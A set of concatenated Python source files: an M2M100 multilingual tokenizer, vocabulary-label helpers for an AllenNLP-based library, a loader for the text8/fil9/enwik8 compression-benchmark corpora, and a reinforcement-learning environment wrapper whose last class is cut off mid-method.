# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for M2M100."""
import json
from contextlib import contextmanager
from pathlib import Path
from shutil import copyfile
from typing import Any, Dict, List, Optional, Tuple, Union
import sentencepiece
from ...tokenization_utils import BatchEncoding, PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
# SentencePiece marker for a word-initial piece
SPIECE_UNDERLINE = "▁"
# Filenames used when saving/loading the tokenizer's vocabulary assets
VOCAB_FILES_NAMES = {
    "vocab_file": "vocab.json",
    "spm_file": "sentencepiece.bpe.model",
    "tokenizer_config_file": "tokenizer_config.json",
}
# Download URLs for the pretrained checkpoints' vocabulary assets
PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "facebook/m2m100_418M": "https://huggingface.co/facebook/m2m100_418M/resolve/main/vocab.json",
        "facebook/m2m100_1.2B": "https://huggingface.co/facebook/m2m100_1.2B/resolve/main/vocab.json",
    },
    "spm_file": {
        "facebook/m2m100_418M": "https://huggingface.co/facebook/m2m100_418M/resolve/main/sentencepiece.bpe.model",
        "facebook/m2m100_1.2B": "https://huggingface.co/facebook/m2m100_1.2B/resolve/main/sentencepiece.bpe.model",
    },
    "tokenizer_config_file": {
        "facebook/m2m100_418M": "https://huggingface.co/facebook/m2m100_418M/resolve/main/tokenizer_config.json",
        "facebook/m2m100_1.2B": "https://huggingface.co/facebook/m2m100_1.2B/resolve/main/tokenizer_config.json",
    },
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "facebook/m2m100_418M": 1024,
}
# Language codes supported by each checkpoint family, keyed by `language_codes`
# fmt: off
FAIRSEQ_LANGUAGE_CODES = {
    "m2m100": ["af", "am", "ar", "ast", "az", "ba", "be", "bg", "bn", "br", "bs", "ca", "ceb", "cs", "cy", "da", "de", "el", "en", "es", "et", "fa", "ff", "fi", "fr", "fy", "ga", "gd", "gl", "gu", "ha", "he", "hi", "hr", "ht", "hu", "hy", "id", "ig", "ilo", "is", "it", "ja", "jv", "ka", "kk", "km", "kn", "ko", "lb", "lg", "ln", "lo", "lt", "lv", "mg", "mk", "ml", "mn", "mr", "ms", "my", "ne", "nl", "no", "ns", "oc", "or", "pa", "pl", "ps", "pt", "ro", "ru", "sd", "si", "sk", "sl", "so", "sq", "sr", "ss", "su", "sv", "sw", "ta", "th", "tl", "tn", "tr", "uk", "ur", "uz", "vi", "wo", "xh", "yi", "yo", "zh", "zu"],
    "wmt21": ['en', 'ha', 'is', 'ja', 'cs', 'ru', 'zh', 'de']
}
# fmt: on
class M2M100Tokenizer(PreTrainedTokenizer):
    """
    Construct an M2M100 tokenizer. Based on [SentencePiece](https://github.com/google/sentencepiece).
    This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods.
    Users should refer to this superclass for more information regarding those methods.
    Args:
        vocab_file (`str`):
            Path to the vocabulary file.
        spm_file (`str`):
            Path to [SentencePiece](https://github.com/google/sentencepiece) file (generally has a .spm extension)
            that contains the vocabulary.
        src_lang (`str`, *optional*):
            A string representing the source language.
        tgt_lang (`str`, *optional*):
            A string representing the target language.
        eos_token (`str`, *optional*, defaults to `"</s>"`):
            The end of sequence token.
        sep_token (`str`, *optional*, defaults to `"</s>"`):
            The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
            sequence classification or for a text and a question for question answering. It is also used as the last
            token of a sequence built with special tokens.
        unk_token (`str`, *optional*, defaults to `"<unk>"`):
            The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
            token instead.
        pad_token (`str`, *optional*, defaults to `"<pad>"`):
            The token used for padding, for example when batching sequences of different lengths.
        language_codes (`str`, *optional*, defaults to `"m2m100"`):
            What language codes to use. Should be one of `"m2m100"` or `"wmt21"`.
        sp_model_kwargs (`dict`, *optional*):
            Will be passed to the `SentencePieceProcessor.__init__()` method. The [Python wrapper for SentencePiece](https://github.com/google/sentencepiece/tree/master/python) can be used, among other things, to set:
            - `enable_sampling`: Enable subword regularization.
            - `nbest_size`: Sampling parameters for unigram. Invalid for BPE-Dropout.
              - `nbest_size = {0,1}`: No sampling is performed.
              - `nbest_size > 1`: samples from the nbest_size results.
              - `nbest_size < 0`: assuming that nbest_size is infinite and samples from the all hypothesis (lattice)
                using forward-filtering-and-backward-sampling algorithm.
            - `alpha`: Smoothing parameter for unigram sampling, and dropout probability of merge operations for
              BPE-dropout.
    Examples:
    ```python
    >>> from transformers import M2M100Tokenizer
    >>> tokenizer = M2M100Tokenizer.from_pretrained("facebook/m2m100_418M", src_lang="en", tgt_lang="ro")
    >>> src_text = " UN Chief Says There Is No Military Solution in Syria"
    >>> tgt_text = "Şeful ONU declară că nu există o soluţie militară în Siria"
    >>> model_inputs = tokenizer(src_text, return_tensors="pt")
    >>> with tokenizer.as_target_tokenizer():
    ...     labels = tokenizer(tgt_text, return_tensors="pt").input_ids
    >>> # model(**model_inputs, labels=labels) should work
    ```"""
    vocab_files_names = VOCAB_FILES_NAMES
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    model_input_names = ["input_ids", "attention_mask"]
    # Special-token ids prepended/appended around every encoded sequence;
    # reset by set_src_lang_special_tokens / set_tgt_lang_special_tokens.
    prefix_tokens: List[int] = []
    suffix_tokens: List[int] = []
    def __init__(
        self,
        vocab_file,
        spm_file,
        src_lang=None,
        tgt_lang=None,
        bos_token="<s>",
        eos_token="</s>",
        sep_token="</s>",
        pad_token="<pad>",
        unk_token="<unk>",
        language_codes="m2m100",
        sp_model_kwargs: Optional[Dict[str, Any]] = None,
        num_madeup_words=8,
        **kwargs,
    ) -> None:
        self.sp_model_kwargs = {} if sp_model_kwargs is None else sp_model_kwargs
        self.language_codes = language_codes
        fairseq_language_code = FAIRSEQ_LANGUAGE_CODES[language_codes]
        self.lang_code_to_token = {lang_code: f"__{lang_code}__" for lang_code in fairseq_language_code}
        # Register every language token (e.g. "__en__") as an additional special
        # token, skipping any the caller already supplied.
        kwargs["additional_special_tokens"] = kwargs.get("additional_special_tokens", [])
        kwargs["additional_special_tokens"] += [
            self.get_lang_token(lang_code)
            for lang_code in fairseq_language_code
            if self.get_lang_token(lang_code) not in kwargs["additional_special_tokens"]
        ]
        super().__init__(
            src_lang=src_lang,
            tgt_lang=tgt_lang,
            bos_token=bos_token,
            eos_token=eos_token,
            sep_token=sep_token,
            unk_token=unk_token,
            pad_token=pad_token,
            language_codes=language_codes,
            sp_model_kwargs=self.sp_model_kwargs,
            num_madeup_words=num_madeup_words,
            **kwargs,
        )
        self.vocab_file = vocab_file
        # encoder: token -> id (from vocab.json); decoder is its inverse
        self.encoder = load_json(vocab_file)
        self.decoder = {v: k for k, v in self.encoder.items()}
        self.spm_file = spm_file
        self.sp_model = load_spm(spm_file, self.sp_model_kwargs)
        self.encoder_size = len(self.encoder)
        # Language tokens get ids immediately after the base vocabulary.
        self.lang_token_to_id = {
            self.get_lang_token(lang_code): self.encoder_size + i for i, lang_code in enumerate(fairseq_language_code)
        }
        self.lang_code_to_id = {lang_code: self.encoder_size + i for i, lang_code in enumerate(fairseq_language_code)}
        self.id_to_lang_token = {v: k for k, v in self.lang_token_to_id.items()}
        self._src_lang = src_lang if src_lang is not None else "en"
        self.tgt_lang = tgt_lang
        self.cur_lang_id = self.get_lang_id(self._src_lang)
        self.set_src_lang_special_tokens(self._src_lang)
        self.num_madeup_words = num_madeup_words
    @property
    def vocab_size(self) -> int:
        """Size of the full vocabulary: base tokens + language tokens + madeup words."""
        return len(self.encoder) + len(self.lang_token_to_id) + self.num_madeup_words
    @property
    def src_lang(self) -> str:
        """Current source language code; setting it resets the special tokens."""
        return self._src_lang
    @src_lang.setter
    def src_lang(self, new_src_lang: str) -> None:
        self._src_lang = new_src_lang
        self.set_src_lang_special_tokens(self._src_lang)
    def _tokenize(self, text: str) -> List[str]:
        """Tokenize a string into SentencePiece sub-word pieces."""
        return self.sp_model.encode(text, out_type=str)
    def _convert_token_to_id(self, token):
        """Convert a token (str) to an id, checking language tokens first."""
        if token in self.lang_token_to_id:
            return self.lang_token_to_id[token]
        return self.encoder.get(token, self.encoder[self.unk_token])
    def _convert_id_to_token(self, index: int) -> str:
        """Converts an index (integer) in a token (str) using the decoder."""
        if index in self.id_to_lang_token:
            return self.id_to_lang_token[index]
        return self.decoder.get(index, self.unk_token)
    def convert_tokens_to_string(self, tokens: List[str]) -> str:
        """Converts a sequence of tokens (strings for sub-words) in a single string."""
        return self.sp_model.decode(tokens)
    def get_special_tokens_mask(
        self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
    ) -> List[int]:
        """
        Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
        special tokens using the tokenizer `prepare_for_model` method.
        Args:
            token_ids_0 (`List[int]`):
                List of IDs.
            token_ids_1 (`List[int]`, *optional*):
                Optional second list of IDs for sequence pairs.
            already_has_special_tokens (`bool`, *optional*, defaults to `False`):
                Whether or not the token list is already formatted with special tokens for the model.
        Returns:
            `List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
        """
        if already_has_special_tokens:
            return super().get_special_tokens_mask(
                token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
            )
        prefix_ones = [1] * len(self.prefix_tokens)
        suffix_ones = [1] * len(self.suffix_tokens)
        if token_ids_1 is None:
            return prefix_ones + ([0] * len(token_ids_0)) + suffix_ones
        return prefix_ones + ([0] * len(token_ids_0)) + ([0] * len(token_ids_1)) + suffix_ones
    def build_inputs_with_special_tokens(
        self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
    ) -> List[int]:
        """
        Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
        adding special tokens. An MBART sequence has the following format, where `X` represents the sequence:
        - `input_ids` (for encoder) `X [eos, src_lang_code]`
        - `decoder_input_ids`: (for decoder) `X [eos, tgt_lang_code]`
        BOS is never used. Pairs of sequences are not the expected use case, but they will be handled without a
        separator.
        Args:
            token_ids_0 (`List[int]`):
                List of IDs to which the special tokens will be added.
            token_ids_1 (`List[int]`, *optional*):
                Optional second list of IDs for sequence pairs.
        Returns:
            `List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
        """
        if token_ids_1 is None:
            return self.prefix_tokens + token_ids_0 + self.suffix_tokens
        # We don't expect to process pairs, but leave the pair logic for API consistency
        return self.prefix_tokens + token_ids_0 + token_ids_1 + self.suffix_tokens
    def get_vocab(self) -> Dict:
        """Return the token -> id vocabulary, including added tokens."""
        vocab = self.encoder.copy()
        vocab.update(self.added_tokens_encoder)
        return vocab
    def __getstate__(self) -> Dict:
        # The SentencePiece processor is a C++ object and cannot be pickled;
        # drop it and rebuild from spm_file in __setstate__.
        state = self.__dict__.copy()
        state["sp_model"] = None
        return state
    def __setstate__(self, d: Dict) -> None:
        self.__dict__ = d
        # for backward compatibility
        if not hasattr(self, "sp_model_kwargs"):
            self.sp_model_kwargs = {}
        self.sp_model = load_spm(self.spm_file, self.sp_model_kwargs)
    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
        """Save vocab.json and the SentencePiece model into `save_directory`."""
        save_dir = Path(save_directory)
        assert save_dir.is_dir(), f"{save_directory} should be a directory"
        vocab_save_path = save_dir / (
            (filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["vocab_file"]
        )
        spm_save_path = save_dir / (
            (filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["spm_file"]
        )
        save_json(self.encoder, vocab_save_path)
        # Copy the binary spm model only if not already present at the target.
        if not spm_save_path.exists():
            copyfile(self.spm_file, spm_save_path)
        return (str(vocab_save_path), str(spm_save_path))
    def prepare_seq2seq_batch(
        self,
        src_texts: List[str],
        src_lang: str = "en",
        tgt_texts: Optional[List[str]] = None,
        tgt_lang: str = "ro",
        **kwargs,
    ) -> BatchEncoding:
        """Encode source (and optionally target) texts with the given language pair."""
        self.src_lang = src_lang
        self.tgt_lang = tgt_lang
        self.set_src_lang_special_tokens(self.src_lang)
        return super().prepare_seq2seq_batch(src_texts, tgt_texts, **kwargs)
    def _build_translation_inputs(self, raw_inputs, src_lang: Optional[str], tgt_lang: Optional[str], **extra_kwargs):
        """Used by translation pipeline, to prepare inputs for the generate function"""
        if src_lang is None or tgt_lang is None:
            raise ValueError("Translation requires a `src_lang` and a `tgt_lang` for this model")
        self.src_lang = src_lang
        inputs = self(raw_inputs, add_special_tokens=True, **extra_kwargs)
        tgt_lang_id = self.get_lang_id(tgt_lang)
        inputs["forced_bos_token_id"] = tgt_lang_id
        return inputs
    @contextmanager
    def as_target_tokenizer(self):
        """
        Temporarily sets the tokenizer for encoding the targets. Useful for tokenizer associated to
        sequence-to-sequence models that need a slightly different processing for the labels.
        """
        self.set_tgt_lang_special_tokens(self.tgt_lang)
        yield
        self.set_src_lang_special_tokens(self.src_lang)
    def set_src_lang_special_tokens(self, src_lang: str) -> None:
        """Reset the special tokens to the source lang setting. No prefix and suffix=[eos, src_lang_code]."""
        lang_token = self.get_lang_token(src_lang)
        self.cur_lang_id = self.lang_token_to_id[lang_token]
        self.prefix_tokens = [self.cur_lang_id]
        self.suffix_tokens = [self.eos_token_id]
    def set_tgt_lang_special_tokens(self, tgt_lang: str) -> None:
        """Reset the special tokens to the target language setting. No prefix and suffix=[eos, tgt_lang_code]."""
        lang_token = self.get_lang_token(tgt_lang)
        self.cur_lang_id = self.lang_token_to_id[lang_token]
        self.prefix_tokens = [self.cur_lang_id]
        self.suffix_tokens = [self.eos_token_id]
    def get_lang_token(self, lang: str) -> str:
        """Return the special token (e.g. "__en__") for a language code."""
        return self.lang_code_to_token[lang]
    def get_lang_id(self, lang: str) -> int:
        """Return the vocabulary id of a language's special token."""
        lang_token = self.get_lang_token(lang)
        return self.lang_token_to_id[lang_token]
def load_spm(path: str, sp_model_kwargs: Dict[str, Any]) -> sentencepiece.SentencePieceProcessor:
    """Instantiate a SentencePiece processor and load the model file at `path`."""
    processor = sentencepiece.SentencePieceProcessor(**sp_model_kwargs)
    processor.Load(str(path))
    return processor
def load_json(path: str) -> Union[Dict, List]:
    """Load and return the JSON content of the file at `path`.

    Opens with an explicit UTF-8 encoding: the vocab files contain non-ASCII
    tokens, and the platform-default encoding (e.g. cp1252 on Windows) would
    fail or misdecode them.
    """
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)
def save_json(data, path: str) -> None:
    """Serialize `data` as pretty-printed JSON to the file at `path`.

    Opens with an explicit UTF-8 encoding so non-ASCII vocab tokens round-trip
    regardless of the platform-default encoding.
    """
    with open(path, "w", encoding="utf-8") as f:
        json.dump(data, f, indent=2)
|
<reponame>javispp/biome-text
"""
Manages vocabulary tasks and fetches vocabulary information
Provides utilities for getting information from a given vocabulary.
Provides management actions such as extending the labels, setting new labels or creating an "empty" vocab.
"""
import logging
from typing import Dict
from typing import List
from allennlp.data import Vocabulary
from allennlp.data.vocabulary import DEFAULT_NON_PADDED_NAMESPACES
from biome.text.features import TransformersFeatures
from biome.text.features import WordFeatures
# Vocabulary namespace under which gold classification labels are stored
LABELS_NAMESPACE = "gold_labels"
_LOGGER = logging.getLogger(__name__)
def get_labels(vocab: Vocabulary) -> List[str]:
    """Return all label strings stored in the vocabulary.

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`

    Returns
    -------
    labels: `List[str]`
        A list of label strings
    """
    token_to_index = vocab.get_token_to_index_vocabulary(namespace=LABELS_NAMESPACE)
    return list(token_to_index)
def label_for_index(vocab: Vocabulary, idx: int) -> str:
    """Resolve a label id to its label string.

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`
    idx: `int`
        the token index

    Returns
    -------
    label: `str`
        The string for a label id
    """
    label = vocab.get_token_from_index(idx, namespace=LABELS_NAMESPACE)
    return label
def index_for_label(vocab: Vocabulary, label: str) -> int:
    """Resolve a label string to its integer id.

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`
    label: `str`
        the label

    Returns
    -------
    label_idx: `int`
        The label id for label string
    """
    label_idx = vocab.get_token_index(label, namespace=LABELS_NAMESPACE)
    return label_idx
def get_index_to_labels_dictionary(vocab: Vocabulary) -> Dict[int, str]:
    """Build a mapping from label ids to label strings.

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`

    Returns
    -------
    labels: `Dict[int, str]`
        A dictionary to get fetch label strings from ids
    """
    index_to_label = vocab.get_index_to_token_vocabulary(LABELS_NAMESPACE)
    return index_to_label
def words_vocab_size(vocab: Vocabulary) -> int:
    """Return the number of entries in the `words` namespace.

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`

    Returns
    -------
    size: `int`
        The vocabulary size for the words namespace
    """
    size = vocab.get_vocab_size(WordFeatures.namespace)
    return size
def extend_labels(vocab: Vocabulary, labels: List[str]):
    """Append label strings to the vocabulary's label namespace.

    Useful e.g. when reusing the weights of an existing classifier with
    additional target labels.

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`
    labels: `List[str]`
        A list of strings containing the labels to add to an existing vocabulary
    """
    vocab.add_tokens_to_namespace(labels, namespace=LABELS_NAMESPACE)
def set_labels(vocab: Vocabulary, new_labels: List[str]):
    """Resets the labels in the vocabulary with a given labels string list

    Parameters
    ----------
    vocab: `allennlp.data.Vocabulary`
    new_labels: `List[str]`
        The label strings to add to the vocabulary
    """
    # Empty both directions of the label mapping in place with dict.clear(),
    # replacing the previous copy-keys-then-delete-one-by-one loop.
    vocab.get_token_to_index_vocabulary(LABELS_NAMESPACE).clear()
    vocab.get_index_to_token_vocabulary(LABELS_NAMESPACE).clear()
    extend_labels(vocab, new_labels)
def create_empty_vocabulary() -> Vocabulary:
    """Creates an empty Vocabulary with configured namespaces

    Returns
    -------
    empty_vocab
        The transformers namespace is added to the `non_padded_namespace`.
    """
    # Workaround for AllenNLP's special handling of the transformers vocab:
    # the transformer vocab carries its own padding and oov tokens, so it must be
    # registered as a non-padded namespace. AllenNLP's default "tags" namespace for
    # transformer vocabs is already non-padded; without flagging ours the same way,
    # saving the vocab to a file and reloading it fails because AllenNLP looks for
    # its default OOV token in the namespace.
    # (see the doc string of `allennlp.data.token_indexers.PretrainedTransformerIndexer`)
    non_padded = DEFAULT_NON_PADDED_NAMESPACES + (TransformersFeatures.namespace,)
    return Vocabulary(non_padded_namespaces=non_padded)
def is_empty(vocab: Vocabulary, namespaces: List[str]) -> bool:
    """Checks if at least one of the given namespaces has an empty vocab.

    Parameters
    ----------
    vocab
        The vocabulary
    namespaces
        Namespaces to check in the vocabulary

    Returns
    -------
    True if one or more namespaces have an empty vocab
    """
    # If a namespace does not exist in the vocab, a default one is created on the fly with a padding and oov token
    # We must drop the padding and out of vocab (oov) tokens -> 2 tokens
    # Generator instead of a materialized list lets any() short-circuit.
    return any(vocab.get_vocab_size(namespace) < 3 for namespace in namespaces)
|
<reponame>shangz-ai/gluon-nlp
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=
"""Large Text Compression Benchmark.
The test data for the Large Text Compression Benchmark is the first 109 bytes
of the English Wikipedia dump on Mar. 3, 2006.
http://download.wikipedia.org/enwiki/20060303/enwiki-20060303-pages-articles.xml.bz2
(1.1 GB or 4.8 GB after decompressing with bzip2 - link no longer works).
Results are also given for the first 108 bytes, which is also used for the
Hutter Prize. These files have the following sizes and checksums:
File Size (bytes) MD5 (GNU md5sum 1.22) SHA-1 (SlavaSoft fsum 2.51)
------ ------------- -------------------------------- ----------------------------------------
enwik8 100,000,000 a1fa5ffddb56f4953e226637dabbb36a 57b8363b814821dc9d47aa4d41f58733519076b2
enwik9 1,000,000,000 e206c3450ac99950df65bf70ef61a12d 2996e86fb978f93cca8f566cc56998923e7fe581
See http://mattmahoney.net/dc/text.html and
http://mattmahoney.net/dc/textdata.html for more information.
"""
__all__ = ['Text8', 'Fil9', 'Enwik8']
import os
import zipfile
from mxnet.gluon.utils import _get_repo_file_url, check_sha1, download
from ...base import get_home_dir
from ..dataset import CorpusDataset
class _LargeTextCompressionBenchmark(CorpusDataset):
    """Base class for Large Text Compression Benchmark corpora.

    Subclasses must define `archive_file` (name, sha1) and `data_file`
    ({segment: (name, sha1)}) class attributes used by `_get_data`.
    """

    def __init__(self, root, segment, **kwargs):
        root = os.path.expanduser(root)
        if not os.path.isdir(root):
            os.makedirs(root)
        self._root = root
        self._segment = segment
        self._namespace = 'gluon/dataset/large_text_compression_benchmark'
        super().__init__(
            self._get_data(self.archive_file, self.data_file, segment, root, self._namespace),
            **kwargs)
    @staticmethod
    def _get_data(archive_file, data_file, segment, root, namespace):
        """Download and extract the archive if the cached file is missing or corrupt; return its path."""
        archive_file_name, archive_hash = archive_file
        data_file_name, data_hash = data_file[segment]
        path = os.path.join(root, data_file_name)
        # Re-download when the file is absent or its sha1 checksum does not match.
        if not os.path.exists(path) or not check_sha1(path, data_hash):
            downloaded_file_path = download(_get_repo_file_url(namespace, archive_file_name),
                                            path=root, sha1_hash=archive_hash)
            with zipfile.ZipFile(downloaded_file_path, 'r') as zf:
                zf.extractall(root)
        return path
class Text8(_LargeTextCompressionBenchmark):
    """Text8 corpus
    http://mattmahoney.net/dc/textdata.html
    Part of the test data for the Large Text Compression Benchmark
    http://mattmahoney.net/dc/text.html. The first 10**8 bytes of the cleaned
    English Wikipedia dump on Mar. 3, 2006.
    License: https://en.wikipedia.org/wiki/Wikipedia:Copyrights
    Parameters
    ----------
    root : str, default '$MXNET_HOME/datasets/text8'
        Path to temp folder for storing data.
        MXNET_HOME defaults to '~/.mxnet'.
    """
    archive_file = ('text8-6c70299b.zip', '6c70299b93b7e1f927b42cd8f6ac1a31547c7a2e')
    data_file = {
        'train': ('text8', '0dc3edebc970dcc96137e7deda4d9995af9d93de')
    }
    def __init__(self,
                 root=os.path.join(get_home_dir(), 'datasets', 'text8'),
                 segment='train',
                 max_sentence_length=10000):
        self._max_sentence_length = max_sentence_length
        super().__init__(root=root, segment=segment)
        # pylint: disable=access-member-before-definition
        # Split each (very long) sentence into chunks of at most
        # max_sentence_length tokens; falsy values (None/0) disable chunking.
        if max_sentence_length:
            data = []
            for sentence in self._data:
                for i in range(0, len(sentence), max_sentence_length):
                    data.append(sentence[i:i + max_sentence_length])
            self._data = data
class Fil9(_LargeTextCompressionBenchmark):
    """Fil9 corpus
    http://mattmahoney.net/dc/textdata.html
    Part of the test data for the Large Text Compression Benchmark
    http://mattmahoney.net/dc/text.html. The first 10**9 bytes of the English
    Wikipedia dump on Mar. 3, 2006.
    License: https://en.wikipedia.org/wiki/Wikipedia:Copyrights
    Parameters
    ----------
    root : str, default '$MXNET_HOME/datasets/fil9'
        Path to temp folder for storing data.
        MXNET_HOME defaults to '~/.mxnet'.
    """
    archive_file = ('fil9-e2a6a602.zip',
                    'e2a6a602be8d3f9712c92423581aa47e7ffd5906')
    data_file = {'train': ('fil9', '08caf9b1d5600233aa19cb6b25d7b798558304d3')}
    def __init__(self,
                 root=os.path.join(get_home_dir(), 'datasets', 'fil9'),
                 segment='train',
                 max_sentence_length=None):
        self._max_sentence_length = max_sentence_length
        super().__init__(root=root, segment=segment)
        # pylint: disable=access-member-before-definition
        # Truthiness guard (consistent with Text8): falsy values (None/0)
        # disable chunking. The previous `is not None` check let 0 through,
        # which would raise ValueError as a zero range() step.
        if max_sentence_length:
            data = []
            for sentence in self._data:
                for i in range(0, len(sentence), max_sentence_length):
                    data.append(sentence[i:i + max_sentence_length])
            self._data = data
class Enwik8(_LargeTextCompressionBenchmark):
    """Enwik8 corpus
    http://mattmahoney.net/dc/textdata.html
    Part of the test data for the Large Text Compression Benchmark
    http://mattmahoney.net/dc/text.html. The first 10**8 bytes of the English
    Wikipedia dump on Mar. 3, 2006.
    License: https://en.wikipedia.org/wiki/Wikipedia:Copyrights
    Parameters
    ----------
    root : str, default '$MXNET_HOME/datasets/text8'
        Path to temp folder for storing data.
        MXNET_HOME defaults to '~/.mxnet'.
    segment
        train, test, valid, trainraw, testraw and validraw segments
        preprocessed with
        https://github.com/salesforce/awd-lstm-lm/blob/master/data/enwik8/prep_enwik8.py
        are provided.
    """
    archive_file = ('enwik8-d25f6043.zip', 'd25f60433af3c02ec6d2dec2435e1732f42a1a68')
    # Segment name -> (filename inside the archive, sha1 checksum)
    data_file = {
        'test': ('test.txt', '1389fdf312b253350a959d4fd63e5e9ae7fe74d4'),
        'train': ('train.txt', 'eff044567358678cd81b9eda516cb146fdba7360'),
        'val': ('valid.txt', '2076ad59caee0099b6c68e66f92d7ef7d0975113'),
        'testraw': ('test.txt.raw', 'c30edaac372090c10a562b8777a6703fa3dd9f7e'),
        'trainraw': ('train.txt.raw', 'd8a8d0ca2a95f20c9d243cb60a579a59d12b0f48'),
        'valraw': ('valid.txt.raw', '2e6218a15c1d5c3c2d23f8092bf07bc24da0d922')
    }
    def __init__(self, root=os.path.join(get_home_dir(), 'datasets', 'enwik8'),
                 segment: str = 'train'):
        super().__init__(root=root, segment=segment)
|
<reponame>suleymanaslan/obstacle-tower-rl
# adapted from https://github.com/Kaixhin/Rainbow
from collections import deque
import time
import torch
import cv2
import gym
import numpy as np
from gym.wrappers.pixel_observation import PixelObservationWrapper
from obstacle_tower_env import ObstacleTowerEnv as ObstacleTower
from IPython import display
from PIL import Image
class Env:
    """Frame-stacking wrapper around a gym environment, following the
    Rainbow DQN preprocessing: 84x84 greyscale frames, a frame skip of 4,
    and an element-wise max over the last two frames to remove flicker.

    States returned by reset()/step() are (window, 84, 84) float tensors.
    """

    def __init__(self, action_size, history_length):
        # All observation tensors live on the GPU.
        self.device = torch.device("cuda:0")
        self.wrapped_env = self._get_env()
        self.action_space = [i for i in range(action_size)]
        # Number of past observations stacked into one state.
        self.window = history_length
        # deque with maxlen: appending automatically drops the oldest frame.
        self.state_buffer = deque([], maxlen=self.window)

    def _get_env(self):
        # Pixel-only observations: the obs dict exposes a "pixels" key
        # holding the rendered RGB frame.
        return PixelObservationWrapper(gym.make("LunarLander-v2"), pixels_only=True)

    def _reset_buffer(self):
        # Pre-fill the history window with blank frames.
        for _ in range(self.window):
            self.state_buffer.append(torch.zeros(84, 84, device=self.device))

    def _process_observation(self, observation):
        # RGB frame -> 84x84 greyscale tensor scaled to [0, 1].
        observation = cv2.cvtColor(cv2.resize(observation["pixels"], (84, 84), interpolation=cv2.INTER_AREA),
                                   cv2.COLOR_RGB2GRAY)
        observation = torch.tensor(observation, dtype=torch.float32, device=self.device).div_(255)
        return observation

    def render(self):
        self.wrapped_env.render()

    def reset(self):
        """Reset the wrapped env and return the initial stacked state."""
        self._reset_buffer()
        observation = self.wrapped_env.reset()
        observation = self._process_observation(observation)
        self.state_buffer.append(observation)
        return torch.stack(list(self.state_buffer), 0)

    def close(self):
        self.wrapped_env.close()

    def _step(self, action, frame_buffer, render=False):
        """Repeat `action` for up to 4 frames (frame skip), accumulating the
        reward; the max of the last two processed frames becomes the new
        observation appended to the history window.
        """
        reward = 0
        for t in range(4):
            observation_t, reward_t, done, info = self.wrapped_env.step(action)
            if render:
                self.render()
            reward += reward_t
            # Only the last two frames of the skip are kept for the max.
            if t == 2:
                frame_buffer[0] = self._process_observation(observation_t)
            elif t == 3:
                frame_buffer[1] = self._process_observation(observation_t)
            if done:
                break
        # Element-wise max over the two buffered frames (flicker removal).
        observation = frame_buffer.max(0)[0]
        self.state_buffer.append(observation)
        return torch.stack(list(self.state_buffer), 0), reward, done, info

    def step(self, action):
        frame_buffer = torch.zeros(2, 84, 84, device=self.device)
        return self._step(action, frame_buffer)
class SimpleEnv(Env):
    """Variant of Env that operates on the raw 8-dimensional LunarLander
    state vector instead of rendered pixel frames."""

    def __init__(self, action_size, history_length):
        super(SimpleEnv, self).__init__(action_size, history_length)

    def _get_env(self):
        # Plain gym env, no pixel-observation wrapper.
        return gym.make("LunarLander-v2")

    def _reset_buffer(self):
        # Pre-fill the history window with zero state vectors.
        blanks = [torch.zeros(8, device=self.device) for _ in range(self.window)]
        self.state_buffer.extend(blanks)

    def _process_observation(self, observation):
        # Raw state vector -> float32 tensor on the target device (no scaling).
        return torch.tensor(observation, dtype=torch.float32, device=self.device)

    def step(self, action):
        # Two-slot buffer for the last two raw observations of the frame skip.
        skip_buffer = torch.zeros(2, 8, device=self.device)
        return self._step(action, skip_buffer)
class ObstacleTowerEnv(Env):
    """Env subclass backed by the Unity Obstacle Tower environment
    (retro mode: greyscale 84x84 observations)."""

    def __init__(self, action_size, history_length):
        super(ObstacleTowerEnv, self).__init__(action_size, history_length)
        # Human-readable names for each component of the multi-discrete action.
        self.movement_dict = {0: "No-Op", 1: "Forward", 2: "Backward"}
        self.cam_rot_dict = {0: "No-Op", 1: "Counter-Clockwise", 2: "Clockwise"}
        self.jump_dict = {0: "No-Op", 1: "Jump"}
        self.turn_dict = {0: "No-Op", 1: "Right", 2: "Left"}

    def _get_env(self):
